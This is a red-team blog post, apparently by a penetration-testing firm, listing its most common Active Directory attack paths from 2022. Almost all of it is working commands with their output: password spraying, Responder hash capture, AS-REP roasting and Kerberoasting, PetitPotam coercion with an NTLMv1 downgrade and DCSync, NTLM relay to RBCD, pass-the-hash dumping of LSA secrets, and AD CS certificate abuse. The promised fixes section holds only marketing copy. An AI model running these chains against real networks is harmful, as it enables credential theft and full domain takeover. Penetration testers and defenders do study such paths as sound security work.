2022 Common Active Directory Exploitation Paths

Here are our common exploitation paths discovered during our internal penetration tests 2022. These paths are not overly complicated as you might find in CTF challenges but they are from real engagements. The purpose of this blog post is not to explain how the vulnerabilities work, there is plenty of documentation online. Instead we just want to share our most common exploitation paths that we have frequently used/abused in 2022. 

We also like these exploitation paths because since they work more at the network level they are more likely to not be affected by local protections like antivirus, which typically block memory attacks such as dumping LSASS.

Hope you find them interesting.

Domain Admins

From Unauthenticated To Authenticated

Track 1 – SMB Null + Password Spray

Use Nmap smb-enum-users or enum4linux-ng to find and enumerate users on systems that they allow SMB login via NULL session.

$ python3 enum4linux-ng.py host1.domain.local
[+] After merging user results we have 563 user(s) total:
'10002':
username: user1
'10015':
username: user2

Then run a password spray attack with CrackMapExec or Hydra against domain controllers using common passwords (careful about account lockout).

$ crackmapexec smb DC01.domain.local -u users.txt -p 'Password1'

Track 2 – LLMNR / NBT-NS / mDNS protocols

Use Responder and get domain hashes from LLMNR, NBT-NS and mDNS protocols. Crack the hashes or relay them against other systems in the network where the user is local administrator. (See next section for relaying hashes).

$ python3 responder.py -I eth0

Track 3 - AS-REP Roast

Grab a list of users for example from SMB NULL or simply by looking at LinkedIn and execute an "AS-REP Roast" attack:

$ python3 GetNPUsers.py domain.local/ -userfile usernames.txt -format john -outputfile ASREP_hashes.txt -dc-ip 10.20.0.1

Then crack the hashes with John or Hashcat.

$ john ASREP_hashes.txt --format=krb5asrep -w=rockyou.txt
$ hashcat -m 18200 ASREP_hashes.txt -a 3 rockyou.txt

Track 4 – PetiPotam + NTLMv1 Downgrade + DCSync

Use PetitPotam to force the domain controller to authenticate against your system (10.10.10.5).

$ python PetitPotam.py 10.10.10.5 DC01.local
[+] Trying pipe lsarpc
[-] Connecting to ncacn_np: DC1.local [\PIPE\lsarpc]
[+] Connected!
[+] Binding to c68**********************e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!!


Then use Responder to downgrade to NTLMv1. Remember to configure the challenge to 1122334455667788:

$ responder -I eth0 -v --lm
[+] Listening for events...
[SMB] NTLMv1 Client : 10.10.10.5
[SMB] NTLMv1 Username : DOMAIN\DC01$
[SMB] NTLMv1 Hash : DC01$::DOMAIN:5AD73B2*****************‌***5346D61:4AC73B5******************************5576C62:1122334455667788


Use crack.sh to crack NTLMv1 hash. Domain controllers have DCSync privileges, so you can use the computer account hash to perform a DCSync attack:

$ crackmapexec smb DC01 -u DC01$ -H a1*****************d3 --ntds
[*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name: DC01)
[+] Dumping the NTDS...
domain.loca\Administrator:500:aad3b435b51404eeaad3b435b51404ee:3e24ddead35464cd4396c6482c673f4a5:::

From Domain Users To Domain Admins

Track 1 – NTLM Relay + RBCD

Use PetitPotam, PrinterBug or Coercer to force the domain controller DC01 to authenticate against our machine:

$ python printerbug.py domain.local/user:Password1@DC01 10.10.10.5
[*] Attempting to trigger authentication via rprn RPC at DC01.domain.local
[*] Bind OK
[*] Got handle
[*] Triggered RPC backconnect, this may or may not have worked


Exploit Resource Based Constrained Delegation (RBCD) by creating a computer account with the "msDS-AllowedToActOn‌BehalfOfOtherIdentity" attribute enabled.

$ ntlmrelayx.py -t ldaps://DC02.domain.local --remove-mic --delegate-access -smb2support
[*] Servers started, waiting for connections
[*] Connection from DOMAIN.LOCAL/DC01$@10.20.0.1 controlled, attacking target ldaps://DC02.domain.local
[*] Authenticating against ldaps://DC02.domain.local as DOMAIN.LOCAL/DC01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Adding new computer with username: LDTWODIEP$ and password: 20D0-d=30%^d7g result: OK
[*] Delegation rights modified successfully!
[*] LDTWODIEP$ can now impersonate users on DC01$ via S4U2Proxy


Then request a Kerberos ticket by impersonating an administrator:

$ getST.py -spn cifs/DC02.domain.local domain.local/LDTWODIEP$ -impersonate administrator -dc-ip 10.20.0.2
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache


Finally load the ticket and use it against the domain controller:

$ export KRB5CCNAME=administrator.ccache
$ impacket-wmiexec domain.local/administrator@DC02.domain.local -k
[!] Launching semi-interactive shell
[!] Press help for extra shell commands
C:\>whoami
domain.local\administrator

Track 2 – NTLM Relay + Local Admin + LSA Secrets

Use Responder and ntlmrelayx to relay to authenticate against system where the relayed account is local administrator. Remember to disable SMB in the configuration file of Responder.

$ python3 responder.py -I eth0
$ ntlmrelayx -tf targets.txt -smb2support
[*] Authenticating against smb://10.20.0.3 as domain.com\administrator SUCCEED
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:3e24ddead35464cd4396c6482c673f4a5:::


Use Pass The Hash attack to dump the LSA secrets e find domain administrator credentials in clear-text

$ crackmapexec smb 10.20.0.3 -u Administrator -H 3e24dcaad25464ce4297d6482c576f4a7 –-lsa
SMB 10.20.0.3 445 LOCAL-CA domain.local\administrator:DomainAdminPass1234!

Track 3 – Kerberosting

Use Rubeus or GetUserSPNs to perform a Kerberoast attack:
GetUserSPNs.py -request -dc-ip 10.20.0.1 domain.local/user1 -outputfile kerberoast_hashes.txt

Then crack the hashes with John or Hashcat:

john --format=krb5tgs -w=rockyou.txt kerberoast_hashes.txt
hashcat -m 13100 --force -a 0 kerberoast_hashes.txt rockyou.txt

Track 4 – Active Directory Certificate Service Exploitation

There are a number of exploitation paths affecting Active Directory Certificate Services (AD CS). A common one is ESC1. The following command requests a certificate for the administrator account:

$ certipy req -u user@domain.local -p 'Password1' -target CA.domain.local -ca DOMAIN-CA -template VulnTemplate -upn 'administrator@domain.local' -dns DC01.domain.local
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 226
[*] Got certificate with multiple identifications
UPN: 'administrator@domain.local'
DNS Host Name: 'DC01.domain.local'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_dc01.pfx'


The certificate can be used to authenticate to the domain controller at 10.20.0.1 and request a Ticket Granting Ticket (TGT) from which the NT hash of the domain administrator will be extracted:

$ certipy auth -pfx administrator_dc01.pfx -dc-ip 10.20.0.1
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'administrator@domain.local'
[1] DNS Host Name: 'DC01.domain.local'
[*] Using principal: administrator@domain.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@domain.local':
aad3b435b51404eeaad3b435b51404ee:3e24ddead35464cd4396c6482c673f4a5

Finally use the NT hash of the domain administrator to connect to the domain controller DC01 via the pass the hash attack as shown earlier.

Quick Fixes

Proelians recommends implementing the following fixes in order to prevent the exploitation paths described above:

At Proelians, we offer a range of innovative solutions designed to help businesses of all sizes safeguard their data and systems from cyber attacks. Our team of experts is dedicated to staying up-to-date on the latest threats and technologies, and we work closely with our clients to develop customized security strategies that meet their unique needs.

Whether you're looking to secure your network, protect your data, or comply with industry regulations, Proelians has the expertise and resources to help. So if you want to take your cyber security to the next level, don't hesitate to get in touch with us today. We look forward to the opportunity to serve you and help keep your organization safe from cyber threats.







Popular posts from this blog

How to Secure Active Directory: a Red Teamer Perspective

Reconnaissance for Red Teamer Operators